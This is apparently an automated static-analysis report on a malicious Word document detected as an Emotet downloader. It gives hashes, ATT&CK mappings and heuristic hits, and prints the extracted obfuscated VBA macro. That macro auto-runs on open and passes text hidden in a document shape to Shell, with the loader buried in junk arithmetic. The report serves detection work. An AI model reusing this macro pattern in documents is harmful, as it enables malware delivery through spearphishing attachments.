Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d0a30f503c8a18a5…

MALICIOUS

Office (OLE)

Size: 137.1 KB
Created: 2018-12-06 07:32:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 914c0f87aef05aa403558d1825c3ef02
SHA-1: 5a6bbe6a47b8329c8f88ee7ebbe2e68f41808e93
SHA-256: d0a30f503c8a18a5d119b95b9544c294cb023d7287419b4fcc64a41e30ea21ba
Risk score: 252

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a legacy WordBasic autoopen macro that invokes cmd.exe with execution flags. This is a strong indicator of a downloader attempting to execute a second-stage payload. The ClamAV detection as 'Doc.Downloader.Emotet-6775739-0' further supports this conclusion, suggesting a known downloader family.

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-6775739-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6775739-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched lines in script:
       LiIGsXwzwMLoLuTFf = 218796878 * CInt(267123033) + jWDOAQPqThjOjz + CLng(41008650 + Sgn(iJSwXWIGkwbZwJjt) - 329070738 * 102390805) - pauGbHIjPczEMoJaVOrdM + Chr(zdCoqtJzqQTSQjkD) * 282550668 / CStr(270755129) / (qtintPkmjNiGmUcdR / 25923628 / ROXRmhktXZqSXCNWUSpJYG / Fix(ajMJhzoFTzDXASb + Hex(FIVMMsvGDYzHKbuOLHzhaXD) + 316230007 + CBool(232774596 + XTTiMDsajADtuhoFGJ)))
    vrEpMtVt = Array(iFZcsV, mYLtPjr, LRMPsURuv, Interaction.Shell(jiNHJwlH, flNts), YfPiR)
       fBjwpkNfFzWmcw = 76698035 * CInt(238465694) + zqhVAKaFuBkKLwuVBVvhO + CLng(264946156 + Sgn(GKHIkFiRPFNiKiiiqIqujd) - 140939386 * 298928330) - bRbdPCWLAbLtCq + Chr(MkVEwOkqTqEYXtGcpNFIoGoz) * 22024058 / CStr(285392726) / (JDWkoSrizIRvoqaImK / 195373647 / RuwWfwhKFvVAGrbnwFQGjLHU / Fix(SRSOwBoZsFOEAEsljcD + Hex(QowOmLhuXSFndwNfPwHuhb) + 92579365 + CBool(254259494 + jvAXVzjDiHdUDbmU)))
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched lines in script:
    Attribute VB_Customizable = True
    Sub autoopen()
    NVRawq
  • Suspicious cmd.exe invocation with execution flag [high] (SC_STR_CMD)
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9248 bytes
SHA-256: 37b21144f1717914ec856c3797f4c0f487f807f86d107f050272f780bda96d48
Detection (ClamAV): No threats found
Obfuscation or payload: likely
215 of 257 identifiers look randomly generated (e.g. 'MkVEwOkqTqEYXtGcpNFIoGoz') — consistent with name-mangling obfuscation.
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "PIZHWATEzlYlA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
NVRawq
End Sub

Attribute VB_Name = "XZpXzRzLj"
Function NVRawq()
On Error Resume Next
   zEiprKwHVPwkAEbcSMTqZdG = 237824839 * CInt(154655325) + KmpjCvooGzIUwViimpoPRLHR + CLng(257106004 + Sgn(lPUVwuStAKSpNDvMzdTwPz) - 53267137 * 311790810) - QwIfwiXtOJZTlwOCCVXLwck + Chr(FOdzoXnHZiiwKNBfuv) * 332866358 / CStr(301295627) / (sMfFwNbkjunLoakBZF / 284827856 / RuGQPsoUsRBdqzMCws / Fix(KLXpjunVnRdUqHXEwFOpEYH + Hex(StJVqOhDhNjKuEWVcWBCOwK) + 149203911 + CBool(127121393 + OwjCnmDfXqkRfYjandaMJti)))
   PZIttFcWMtBZcYa = 188188295 * CInt(335023197) + QWNJtlzcszGfjTrIs + CLng(156627868 + Sgn(DvZnzrVSumqCWO) - 140154038 * 157072262) - sGjWvQNiQjNhiTjCauV + Chr(jNSYTDpBukRLwQQmrjIfMIj) * 71231191 / CStr(52992991) / (LTKAwTzjsioIDraMjjPBl / 120305156 / tLtmqiadHQhrVr / Fix(ozLPYlwidQEzYDvGztQQoCh + Hex(CRBjsVzFVpsSqWu) + 111871901 + CBool(314470781 + QVmiBaLJiwEaGlQCMGkR)))
   GJEfFvMBIDqtmoNCquOfWipT = 206377742 * CInt(55413212) + jZnuJDUhzbQBnIMh + CLng(246274778 + Sgn(VMOnEGVStccTlAwjf) - 186683563 * 139536559) - hpSHNaasaWKwDDJv + Chr(sUjYqJrEjqQFEckMbifuGaij) * 187559383 / CStr(290039688) / (RjPhqAlmHokqjaDhjJ / 260122711 / uajcVdBrSqzwwmZYQJ / Fix(ESpcXrszUCtuXoVdrwn + Hex(NzuUQportAfQajjE) + 27537030 + CBool(326515882 + lddjoZwcHdJibczM)))
   sqjGwhKEwTlvFQCOjGdf = 58181083 * CInt(109414655) + OzWiWwrisaLjrOMMlkhH + CLng(228544669 + Sgn(sPVrKMLPPYbJSJbznGHosUtj) - 67403647 * 287057) - usvaJzTEGNinfTcKnF + Chr(wDklwbAuCXWlhKpQXUzSL) * 335282101 / CStr(29748664) / (mITbVPJGibDTJGzzID / 108549467 / kbzcpCFqqmWzwPznHYYmN / Fix(HFHVGQUzJHiXkKLql + Hex(KTQrFGVtGLskidTUT) + 291490713 + CBool(142902208 + voVtcOPbfocRmGcuzQ)))
   RarUVmVCUoqQblqIFUFLG = 272555764 * CInt(327507232) + YfCzdLNNtsOIuJNqBKwImYZ + CLng(173229161 + Sgn(fmGKSfcczwpkWYIacXiXiNw) - 44961355 * 97577475) - wtoEAGcFwZHDbNlf + Chr(NXGflniKAqDLSqzvIijnuvjI) * 108718026 / CStr(172365536) / (SZwVlCRiiIiKFGuzPYtfj / 56004517 / SiCrARowPLEPkEV / Fix(JAHQmiXdhAwUjWuzK + Hex(driLRRuKPzAqKuuGk) + 205438535 + CBool(184698348 + UoGYJAUUPsREFSaijziqVcP)))
Set zMJJF = PIZHWATEzlYlA.Shapes(dEDPqSU + "uWpaDwCVwiAtCQ" + WVzWOq).TextFrame
   hwjhrnDbtzqtRzKAQk = 23080852 * CInt(225666413) + uXuAaHOjrvMohiqC + CLng(131249919 + Sgn(VnFWuhniOcrocvdGnbohR) - 209168224 * 272783793) - CCdEkRTwwAhuGXcNNvtlsDS + Chr(LauPNmSqzNUrDiuzJ) * 296109569 / CStr(287728002) / (NizPwbUWmEzzjMtJWEkJ / 223495273 / ztDlKiAvbzLqDcbiQmSvDtO / Fix(HqpkaEIiuVlGMNRpVq + Hex(AntIQirowrmnDiidTpQV) + 153598882 + CBool(284247436 + vhrVSDVcaNRNhNiYCiQJ)))
   NTtZsizDImRJODaZAMuCT = 159219844 * CInt(60757510) + JKuEpYztQloWDAJ + CLng(154124394 + Sgn(vqGsVaEaImhfsQpKmQij) - 294327917 * 92295337) - pYtdPDWzDWXXhDNojqdhl + Chr(NYUzMQkaolhGQUbzp) * 151119089 / CStr(249413737) / (dIUsHHYcztOjwZKVJPrFPc / 227629808 / qbmtMmAGvzmEDbsFsHauWA / Fix(rJGnafjWAahCjUi + Hex(NsHlwmGRhXlNHCnQq) + 125855231 + CBool(311837521 + FwaaPcliVZLkNsNBOOJED)))
   pJffcwHvKbUMjriwbXKaPTkR = 40741025 * CInt(250660622) + iaMizcRYdbCKrsNjNwKscJN + CLng(191298475 + Sgn(FhjVYNZqEYVzwVjSTFWZNThC) - 241037806 * 156503078) - vtOZMjfuvhCENcTmUs + Chr(QdaZJDrDllAhlAuiwqwJO) * 113421860 / CStr(176301293) / (lQAIwthNJzHpUUFWVftIuA / 116553206 / TwWvVjWwCmosCi / Fix(rEmXlsEJclcoiXS + Hex(lwwpzWlracInifMTmYCEIcj) + 75131093 + CBool(99227775 + uKtvobksCtGsJVSvzJkRbw)))
   nqkiLEjWzTZiboubsBhLPknm = 64929628 * CInt(172971848) + HsUKiwZwPMtqFciwXAzBP + CLng(55594890 + Sgn(BltohCDwZlXZii) - 60007231 * 286410703) - CsiPzLcijmPmKYRwpTZpH + Chr(tMOUEiDEUOIRzXdoCZQGAQo) * 78454345 / CStr(98042406) / (FbpLjCaJzSBiHufc / 115952929 / dsZtVBQAYBrcYC / Fix(scbOJfGrpYLnYSW + Hex(YzniWmLGoujdZSWuwYO) + 115018362 + CBool(23773024 + IVXBkVJNshCaTdkU)))
jiNHJwlH = zMJJF.ContainingRange + KVNlI + aJcazfo + qcSNu + lMfXbzN + ltiGWGu + SAsszS + OlTGu + obYdvJcv + MlJafjir + OotPMCX + ijrmjSv
   HDSMYzlZwmNvPikUwzSDUt = 146009595 * CInt(164942401) + ikCrsrHrfrXpXdSZIpXNtOz + CLng(46587597 + Sgn(CbaNVNhtTtPjhDuGEkr) - 85569329 * 201463335) - VAdMEwLzQnvQqPjdKdq + Chr(EjCqaldHpiGuvbFakIJihUdc) * 267169876 / CStr(114617968) / (iZbZNWiWmznlSVEK / 249956379 / BUOKGtBTHOjFaBIZwhNE / Fix(XNFTcwXrNdKrvnwzUThYtPT + Hex(jWlctWWwhodGJqdwictlYN) + 208231696 + CBool(92298952 + biOjjwHuSmGKuzrG)))
   ETPndfzzwJPndzZS = 338390402 * CInt(62953677) + TCEPRTufrkUOJjAmkHwGwD + CLng(221503444 + Sgn(uJQsoaFvduSJzEzT) - 229502415 * 3590892) - NdvFDcLpKACnPVt + Chr(ICBqQiYkPQrmjKiXwv) * 135179340 / CStr(218854134) / (DMQdluuaGCnGjpQhJqiEKqmk / 162333301 / AWfpUAMWEqlNiki / Fix(INDjwVNqoEmcoMZf + Hex(cuYuRinuNlavwL) + 328711018 + CBool(176758236 + iZhsMfIoAPOjhrQFICpFPqfQ)))
   scDqdEEijjFmGiGn = 130027884 * CInt(311170984) + HvwbnjuirXhfaRhY + CLng(194176906 + Sgn(FrpEotCnaJZpwGuzSRt) - 2491783 * 106074952) - jWNLwAiVZJdOODXD + Chr(FZAGlIBYaldwPid) * 59717801 / CStr(310930274) / (SrcuCIFjPMksqZP / 68102660 / aPDwNLmYOBWJfAFTuELiKX / Fix(BBtpoivDjFqCtrKEfqVoHiZ + Hex(LfYvUDjiDYCwUWzqSzmEo) + 329523949 + CBool(78501801 + kAfnojkScIdJJzifZMw)))
   HjWdhFtYREwCvopS = 94075995 * CInt(187240468) + oEBwjGNNMwdzUiAz + CLng(336711868 + Sgn(VJhcrEpKLiiSuBO) - 14817014 * 342116013) - FiqWTrjZoHdYupq + Chr(sTcLNzIVvifuEbjS) * 199199109 / CStr(287888600) / (QPwppwRQihnksbhIuZovIaU / 181174524 / MlVMXKtCwZwtdmPwjZoIw / Fix(TWSosqwkqvXEcKvELWthwC + Hex(PRmYzcAfTmaSztiSDGLiA) + 145203577 + CBool(161761711 + FAcOSPQpQlDXGRzI)))
   DfBPJVtijLSmcwobVi = 92310663 * CInt(31707051) + NlbaBwbmTzuSKwcjDZIBbLG + CLng(263410637 + Sgn(QrVirGpoapuZoIYSrPMXURzM) - 307136850 * 113529312) - FDQCinckEFEctEd + Chr(GhGPRkikwuQdzsInZzklK) * 260739396 / CStr(104666240) / (LYTMnmSTqhsfnCrVUjFkXw / 244820254 / wQCvUsZTRUDtQWzJ / Fix(znRzdAXFOQdhfONnGPW + Hex(XwwIZNTwwEwivJaLTNTQf) + 274278835 + CBool(37769440 + vlmGqGJGaaDwpJaPjYH)))
   pEwBKidwwJDDzwRpiUQ = 291650561 * CInt(21240084) + ibzbmUGuhAwijjFMf + CLng(222498106 + Sgn(oKtohSKqXVzVVWXVUCirI) - 287050852 * 27648623) - CEVQkkWpiJPGomSJcij + Chr(kfdIIKkKwqZwGSmdwtF) * 255568839 / CStr(340241198) / (mLHRhikZOdIfrWb / 84709945 / azMsskSAWAoMiZw / Fix(ctRBrdCaWbvoaaPBjlf + Hex(nOtboRLhvNjELHOdKLQzwl) + 144566870 + CBool(110198020 + iZvkncwuJlNzpMZRViJvrc)))
   BCiBYWZMhazKJWYiCP = 307254377 * CInt(215800508) + qImjwMjHwkmjGTz + CLng(58022661 + Sgn(CkmIPbHYpYfzJCooOLtv) - 135800618 * 172339118) - tEiqLiCDbVYMKuwa + Chr(fIJnAJohzsrHDNJcZtEhl) * 315686130 / CStr(299942587) / (VDckqiuQlMQLRWsuuJNmLw / 159339368 / PjkAutvjPWSzhDq / Fix(wbWrwzLCBJmciHbZfU + Hex(GttVrQhwuEvNqStojZ) + 216849070 + CBool(73317420 + YizkGTAIvtRMikaEG)))
Const flNts = 0
   LiIGsXwzwMLoLuTFf = 218796878 * CInt(267123033) + jWDOAQPqThjOjz + CLng(41008650 + Sgn(iJSwXWIGkwbZwJjt) - 329070738 * 102390805) - pauGbHIjPczEMoJaVOrdM + Chr(zdCoqtJzqQTSQjkD) * 282550668 / CStr(270755129) / (qtintPkmjNiGmUcdR / 25923628 / ROXRmhktXZqSXCNWUSpJYG / Fix(ajMJhzoFTzDXASb + Hex(FIVMMsvGDYzHKbuOLHzhaXD) + 316230007 + CBool(232774596 + XTTiMDsajADtuhoFGJ)))
vrEpMtVt = Array(iFZcsV, mYLtPjr, LRMPsURuv, Interaction.Shell(jiNHJwlH, flNts), YfPiR)
   fBjwpkNfFzWmcw = 76698035 * CInt(238465694) + zqhVAKaFuBkKLwuVBVvhO + CLng(264946156 + Sgn(GKHIkFiRPFNiKiiiqIqujd) - 140939386 * 298928330) - bRbdPCWLAbLtCq + Chr(MkVEwOkqTqEYXtGcpNFIoGoz) * 22024058 / CStr(285392726) / (JDWkoSrizIRvoqaImK / 195373647 / RuwWfwhKFvVAGrbnwFQGjLHU / Fix(SRSOwBoZsFOEAEsljcD + Hex(QowOmLhuXSFndwNfPwHuhb) + 92579365 + CBool(254259494 + jvAXVzjDiHdUDbmU)))
   tfsDBzEcGfYwmKzGrwJXRw = 316868193 * CInt(54539351) + lRvhaowaYHzYZOUJXhHlpJGD + CLng(28125111 + Sgn(TZoWujkGQjIvfrbVODzhSk) - 273737182 * 93552483) - QoWIbLsdoUXmBMQnTzoBcCQ + Chr(TuCFWTikadiuNzoV) * 105321363 / CStr(116468473) / (WEjMrhuznBMRNXMojInHVl / 256147469 / YhVZVJTlKLuFjiKY / Fix(UviNMQXBJHMcKVlRXoK + Hex(UddibGCdHEwzPiAp) + 27117047 + CBool(334269556 + QwYMBGIAqJnMtAMI)))
   nRGwMZpZSzDaaMDQLJL = 157731451 * CInt(67110813) + VrKRKkjYlqGtEnqE + CLng(69392943 + Sgn(iiuGwdDuobjLJpPbvOouO) - 33694335 * 277723567) - OMUhHQZGwbpjQOshOPvHpaj + Chr(ddscQPVdnBsmJWmYB) * 188570901 / CStr(82675432) / (zjKjWHjzJiDnjDDiXzqiG / 83349362 / PWGXscXGNNzQtSLGJjWTFzE / Fix(FSIADmdcnrvKPjo + Hex(lbqZjmJMMrjzksmRRB) + 119591149 + CBool(169734640 + XCakUdCWAqavzidHfW)))
   iSDKCXWnWAHcrfLHCKPAiQQ = 254456884 * CInt(147902934) + vWXMCDIoRYjzJzwmS + CLng(160757231 + Sgn(KudiBIpzMMNBQomczQJz) - 21264974 * 130019293) - NmbCASCvwsFLUS + Chr(VENEvbDXQLWUwWIadrrPwa) * 38090216 / CStr(265087608) / (KRPJKcSJLuFkzXbKOKriz / 30907386 / pRcUdDrvwZXlKoNFiEK / Fix(cCqiTQEhPOKjFsZriIpGTw + Hex(LcmQWAFIZnSwnbz) + 7668154 + CBool(83644917 + JfjPnjSOVWaPESdvfChzijKF)))
   aNnduUqnPshztRwMbf = 168062566 * CInt(325046584) + WnqHTNjsKoauGDiFt + CLng(219730026 + Sgn(ufXDbNiRROavcdHEZzVaH) - 65999264 * 304282898) - EGCnOSHiwoCjzk + Chr(upvPikszQwzEIXGck) * 246827402 / CStr(125337840) / (VKqCzHsznbXFpiblLvQULImp / 101101413 / zKrMRwfltjztPWsu / Fix(patOawVRpVwmMYBn + Hex(IhGbJZZDorlSftbRwwOVz) + 165155063 + CBool(97334049 + ubchzhLwGiOLoifAUL)))
End Function